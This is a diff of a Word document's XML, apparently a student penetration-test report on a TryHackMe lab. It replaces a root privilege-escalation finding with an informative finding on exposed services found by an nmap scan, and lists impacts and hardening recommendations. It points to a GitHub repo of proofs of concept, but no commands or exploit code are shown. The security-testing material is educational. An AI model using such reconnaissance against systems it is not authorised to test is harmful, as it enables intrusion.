+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Critical </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1674,6 +2193,171 @@
       <w:pPr>
         <w:jc w:val="both"/>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">- the project repo on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>github</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> contains all project </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>info,steps</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>pocs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="722757F1" wp14:editId="7EE236AB">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>center</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>146685</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="3810000" cy="285750"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="2040028229" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="3810000" cy="285750"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:r>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:instrText>HYPERLINK "https://github.com/ahmeedkhattabj/omerta-final-project"</w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rStyle w:val="Hyperlink"/>
+                              </w:rPr>
+                              <w:t>https://github.com/ahmeedkhattabj/omerta-final-project</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="722757F1" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:11.55pt;width:300pt;height:22.5pt;z-index:251687936;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:center;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:r>
+                        <w:fldChar w:fldCharType="begin"/>
+                      </w:r>
+                      <w:r>
+                        <w:instrText>HYPERLINK "https://github.com/ahmeedkhattabj/omerta-final-project"</w:instrText>
+                      </w:r>
+                      <w:r>
+                        <w:fldChar w:fldCharType="separate"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rStyle w:val="Hyperlink"/>
+                        </w:rPr>
+                        <w:t>https://github.com/ahmeedkhattabj/omerta-final-project</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:fldChar w:fldCharType="end"/>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
       <w:r>
         <w:br w:type="page"/>
       </w:r>
@@ -1682,7 +2366,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc188314209"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc215079548"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>R</w:t>
@@ -1734,14 +2418,14 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552CEAB7" wp14:editId="281DC3C0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552CEAB7" wp14:editId="76968157">
             <wp:extent cx="5486400" cy="3200400"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1069227309" name="Chart 1"/>
             <wp:cNvGraphicFramePr/>
             <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
-                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
+                <c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
               </a:graphicData>
             </a:graphic>
           </wp:inline>
@@ -1761,7 +2445,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="12" w:name="_Toc186497246"/>
-      <w:bookmarkStart w:id="13" w:name="_Toc188314210"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc215079549"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Potential Business Impact</w:t>
@@ -1816,7 +2500,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Full system compromise: An attacker with root access can fully control the host — read, modify, or delete any file and run arbitrary code.</w:t>
+        <w:t>Significant expansion of the attack surface and exposure of internal services.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1836,7 +2520,23 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Exposure of secrets: Sensitive assets (SSH keys, /etc/shadow, database credentials, configuration files) can be stolen, enabling subsequent attacks.</w:t>
+        <w:t xml:space="preserve">Leakage of sensitive files and internal </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Calibri"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>information that</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Calibri"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> enables precise targeted attacks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1856,7 +2556,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Data integrity loss: Attackers can alter or corrupt application data, logs, or backups, undermining trust in system outputs.</w:t>
+        <w:t>Ability for an attacker to upload malicious files to the server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1876,7 +2576,23 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Service disruption: Critical services may be stopped, tampered with, or overwhelmed, causing downtime and business interruption.</w:t>
+        <w:t xml:space="preserve">Remote Code Execution </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Calibri"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>leading</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Calibri"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to a reverse shell and full system control.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1896,7 +2612,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Persistence &amp; stealth: The attacker can create hidden backdoors (new users, SUID binaries, cronjobs) that are hard to detect and remove.</w:t>
+        <w:t>Theft of all sensitive data stored on the compromised system.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1916,7 +2632,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Lateral movement: Compromised host can be used as a pivot to breach internal networks or cloud resources.</w:t>
+        <w:t>Modification or deletion of critical files, causing operational disruption.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1936,7 +2652,15 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Regulatory &amp; legal exposure: Theft of personal or regulated data risks non-compliance (e.g., GDPR, PCI) and potential fines or legal action.</w:t>
+        <w:t>Installation of backdoors, allowing long</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cs="Calibri"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:noBreakHyphen/>
+        <w:t>term undetected persistence.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1956,7 +2680,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Reputational damage: A successful breach can erode customer and partner trust, impacting sales and brand value.</w:t>
+        <w:t>Lateral movement to other systems within the network.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1976,7 +2700,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Operational cost: Incident response, forensic analysis, remediation, and credential rotation incur significant time and financial expense.</w:t>
+        <w:t>Privilege escalation to root/admin, enabling full bypass of security controls.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1996,7 +2720,7 @@
           <w:rFonts w:cs="Calibri"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Enabler for severe threats: With host-level access an attacker can deploy ransomware, exfiltrate intellectual property, or sabotage production at scale.</w:t>
+        <w:t>Major financial, legal, and reputational damage due to data breaches or service downtime.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2018,7 +2742,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc188314211"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc215079550"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Technical Vulnerabilities Details</w:t>
@@ -2032,15 +2756,11 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_VULNERABLE_AND_OUTDATED"/>
-      <w:bookmarkStart w:id="16" w:name="_Application_Wide_SQL"/>
-      <w:bookmarkEnd w:id="15"/>
-      <w:bookmarkEnd w:id="16"/>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Below are the finding details with their respective exploitation scenarios in severity </w:t>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Below are the finding details with their respective exploitation scenarios in severity ordered from Critical to Informative. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2050,14 +2770,22 @@
         <w:jc w:val="both"/>
         <w:rPr>
           <w:noProof/>
-        </w:rPr>
-      </w:pPr>
+          <w:color w:val="00B0F0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="15" w:name="_VULNERABLE_AND_OUTDATED"/>
+      <w:bookmarkStart w:id="16" w:name="_Application_Wide_SQL"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc215079551"/>
+      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="16"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
-        </w:rPr>
-        <w:t>PRIVILEGE ESCALATION TO ROOT ACCESS</w:t>
-      </w:r>
+          <w:color w:val="00B0F0"/>
+        </w:rPr>
+        <w:t>exposed services</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -2078,7 +2806,7 @@
           <w:tcPr>
             <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             <w:tcW w:w="2875" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="EE0000"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2099,7 +2827,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="6475" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="EE0000"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="00B0F0"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2114,7 +2842,7 @@
               <w:rPr>
                 <w:color w:val="FFFFFF" w:themeColor="background1"/>
               </w:rPr>
-              <w:t>HIGH</w:t>
+              <w:t>informative</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2151,12 +2879,12 @@
               <w:jc w:val="both"/>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
-            <w:hyperlink r:id="rId9" w:anchor="CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" w:history="1">
+            <w:hyperlink r:id="rId10" w:anchor="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>CVSS 8.8</w:t>
+                <w:t>CVSS 0.0</w:t>
               </w:r>
             </w:hyperlink>
           </w:p>
@@ -2190,17 +2918,20 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:pStyle w:val="ListParagraph"/>
-              <w:numPr>
-                <w:ilvl w:val="0"/>
-                <w:numId w:val="28"/>
-              </w:numPr>
               <w:jc w:val="both"/>
               <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">User terminal </w:t>
-            </w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId11" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://tryhackme.com/room/vulnversity</w:t>
+              </w:r>
+            </w:hyperlink>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2243,12 +2974,20 @@
               <w:jc w:val="both"/>
               <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
             </w:pPr>
-            <w:hyperlink r:id="rId10" w:anchor=":~:text=Another%20common%20method%20of%20privilege,(RCE)%20with%20high%20privileges." w:history="1">
+            <w:hyperlink r:id="rId12" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
                 </w:rPr>
-                <w:t>Linux privilege escalation</w:t>
+                <w:t xml:space="preserve"> </w:t>
+              </w:r>
+            </w:hyperlink>
+            <w:hyperlink r:id="rId13" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://nmap.org/book/man-version-detection.html</w:t>
               </w:r>
             </w:hyperlink>
           </w:p>
@@ -2281,7 +3020,49 @@
         <w:rPr>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">As a regular user with limited permissions I can get the root shell and execute any command I cant execute before </w:t>
+        <w:t xml:space="preserve">We tried to map the testing service for us so we decided to do </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>an</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scan to know which services and versions the web application relies </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and we got too much info it shouldn’t be reached</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2290,55 +3071,6 @@
       </w:pPr>
       <w:r>
         <w:t>IMPACT</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:cs="Calibri"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Calibri"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Full system compromise: An attacker with root access can fully control the host — read, modify, or delete any file and run arbitrary code.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="6"/>
-        </w:numPr>
-        <w:rPr>
-          <w:rFonts w:cs="Calibri"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:cs="Calibri"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Exposure of secrets: Sensitive assets (SSH keys, /etc/shadow, database credentials, configuration files) can be stolen, enabling subsequent attacks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="TechnicalHeader"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>RECOMMENDATIONS</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2346,37 +3078,11 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
+          <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:hAnsi="Symbol"/>
-        </w:rPr>
-        <w:t></w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
-        </w:rPr>
-        <w:t>Apply least privilege:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Ensure container or application users run with minimal permissions — avoid granting unnecessary write access to system directories like </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="HTMLCode"/>
-          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
-        </w:rPr>
-        <w:t>/etc/default</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>Reveals internal services that should not be publicly reachable.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2384,27 +3090,11 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
+          <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:hAnsi="Symbol"/>
-        </w:rPr>
-        <w:t></w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
-        </w:rPr>
-        <w:t>Harden file permissions:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Review and lock down permissions for sensitive configuration files and scripts to prevent unauthorized modifications.</w:t>
+        <w:t>Enables fingerprinting of software versions and technologies.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2412,27 +3102,11 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
+          <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:hAnsi="Symbol"/>
-        </w:rPr>
-        <w:t></w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
-        </w:rPr>
-        <w:t>Disable SUID binaries where possible:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Remove or restrict execution of SUID binaries not required for normal operation.</w:t>
+        <w:t>Allows attackers to identify outdated or vulnerable services.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2440,58 +3114,189 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="11"/>
+          <w:numId w:val="28"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hAnsi="Symbol"/>
-        </w:rPr>
-        <w:t></w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
-        </w:rPr>
-        <w:t>Implement proper user separation:</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Prevent containers or service accounts from accessing host-level paths or sensitive environment variables.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Makes</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> targeted exploitation easier (e.g., known CVEs).</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="TechnicalHeader"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Steps to Reproduce</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>RECOMMENDATIONS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="30"/>
         </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Close all unnecessary ports</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and disable any service that is not required for business operations.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+        </w:rPr>
+        <w:t>Implement strict firewall rules</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> to allow only trusted IPs or networks to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>accesssensitive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> services.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="30"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Encrypt sensitive data using strong algorithms like AES before logging.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TechnicalHeader"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Steps to Reproduce</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:szCs w:val="24"/>
           <w:lang w:bidi="ar-EG"/>
         </w:rPr>
       </w:pPr>
